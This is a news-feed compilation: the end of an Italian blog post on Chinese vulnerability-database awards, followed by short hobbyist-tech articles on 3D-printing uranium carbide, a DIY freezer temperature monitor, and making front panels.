Grande attenzione è stata data anche alle collaborazioni accademiche, con premi conferiti a istituzioni come l’Università di Aeronautica e Astronautica di Pechino e l’Istituto tecnico di Qingyuan. L’importanza del contributo universitario è stata sottolineata come elemento chiave per la formazione di nuovi talenti e lo sviluppo di soluzioni innovative nel campo della sicurezza informatica.
Numerose aziende, tra cui anche i principali operatori di telecomunicazioni, fornitori energetici e realtà industriali strategiche, sono state premiate per la cooperazione nel rafforzare la sicurezza delle infrastrutture critiche. Questo dimostra come il tema della cybersicurezza sia ormai centrale per la resilienza nazionale, coinvolgendo settori trasversali e fondamentali per la stabilità del Paese.
Non sono mancati i riconoscimenti individuali: esperti tecnici selezionati per il loro contributo specifico sono stati premiati come “Specially Appointed Technical Experts of the Year”, tra cui figure provenienti da aziende leader come CyberKunlun, Huashun Xinan e Douxiang. I loro interventi hanno rappresentato un esempio di eccellenza nella risposta alle minacce informatiche.
A conclusione dell’evento, i rappresentanti delle istituzioni accademiche e aziendali hanno tenuto discorsi che hanno riaffermato la necessità di continuare a costruire un ecosistema coeso e proattivo per la gestione delle vulnerabilità.
Il CNNVD ha ribadito il proprio impegno a rafforzare il ruolo del database come punto di riferimento nazionale, ponte tra talenti, istituzioni e aziende, per garantire una sicurezza informatica sempre più avanzata e coordinata.
L'articolo In Cina il CNVD premia i migliori ricercatori di sicurezza e la collaborazione tra istituzioni e aziende proviene da il blog della sicurezza informatica.
3D Printing Uranium-Carbide Structures for Nuclear Applications
Fabrication of uranium-based components via DLP. (Zanini et al., Advanced Functional Materials, 2024)
Within the nuclear sciences, including fuel production and nuclear medicine (radiopharmaceuticals), often specific isotopes have to be produced as efficiently as possible, or allow for the formation of (gaseous) fission products and improved cooling without compromising the fuel. Here having the target material possess an optimized 3D shape to increase surface area and safely expel gases during nuclear fission can be hugely beneficial, but producing these shapes in an efficient way is complicated. Here using photopolymer-based stereolithography (SLA) as recently demonstrated by [Alice Zanini] et al. with a research article in Advanced Functional Materials provides an interesting new method to accomplish these goals.
In what is essentially the same as what a hobbyist resin-based SLA printer does, the photopolymer here is composed of uranyl ions as the photoactive component along with carbon precursors, creating solid uranium dicarbide (UC2) structures upon exposure to UV light with subsequent sintering. Uranium-carbide is one of the alternatives being considered for today’s uranium ceramic fuels in fission reactors, with this method possibly providing a reasonable manufacturing method.
Uranium carbide is also used as one of the target materials in ISOL (isotope separation on-line) facilities like CERN’s ISOLDE, where having precise control over the molecular structure of the target could optimize isotope production. Ideally equivalent photocatalysts to uranyl can be found to create other optimized targets made of other isotopes as well, but as a demonstration of how SLA (DLP or otherwise) stands to transform the nuclear sciences and industries.
Overengineered Freezer Monitor Fills Market Void
A lot of projects we see around here are built not just because they can be built, but because there’s no other option available. Necessity is the mother of invention, as they say. And for [Jeff] who has many thousands of dollars of food stowed in a chest freezer, his need for something to keep track of his freezer’s status was greater than any commercial offering available. Not only are freezers hard on batteries, they’re hard on WiFi signals as well, so [Jeff] built his own temperature monitor to solve both of these issues.
The obvious solution here is to have a temperature probe that can be fished through the freezer in some way, allowing the microcontroller, battery, and wireless module to operate outside of the harsh environment. [Jeff] is using K-type thermocouples here, wired through the back of the freezer. This one also is built into a block of material which allows him to get more diffuse temperature readings than a standard probe would provide. He’s also solving some other problems with commercially available probes here as well, as many of them require an Internet connection or store data in a cloud. To make sure everything stays local, he’s tying this in to a Home Assistant setup which also allows him to easily make temperature calibrations as well as notify him if anything happens to the freezer.
Although the build is very robust (or, as [Jeff] himself argues, overengineered) he does note that since he built it there have been some additional products offered for sale that fit this niche application. But even so, we always appreciate the customized DIY solution that avoids things like proprietary software, subscriptions, or cloud services. We also appreciate freezers themselves; one of our favorites was this restoration of a freezer with a $700,000 price tag.
Easy Panels With InkJet, Adhesives, and Elbow Grease
Nothing caps off a great project like a good, professional-looking front panel. Looking good isn’t easy, but luckily [Accidental Science] has a tutorial for a quick-and-easy front panel technique in the video below.
It starts with regular paper, and an inkjet or laser printer to print your design. The paper then gets coated on both sides: matte varnish on the front, and white spray paint on the obverse. Then it’s just a matter of cutting the decal from the paper, and it gluing to your panel. ([Accidental Science] suggests two-part epoxy, but cautions you make sure it does not react to the paint.)
He uses aluminum in this example, but there’s no reason you could not choose a different substrate. Once the paper is adhered to the panel, another coat of varnish is applied to protect it. Alternatively, clear epoxy can be used as glue and varnish. The finish produced is very professional, and holds up to drilling and filing the holes in the panel.
We’d probably want to protect the edges by mounting this panel in a frame, but otherwise would be proud to put such a panel on a project that required it. We covered a similar technique before, but it required a laminator.If you’re looking for alternatives, Hackaday community had a lot of ideas on how to make a panel, but if you have a method you’ve documented, feel free to put in the tip line.
youtube.com/embed/ekGpPaAR3Ec?…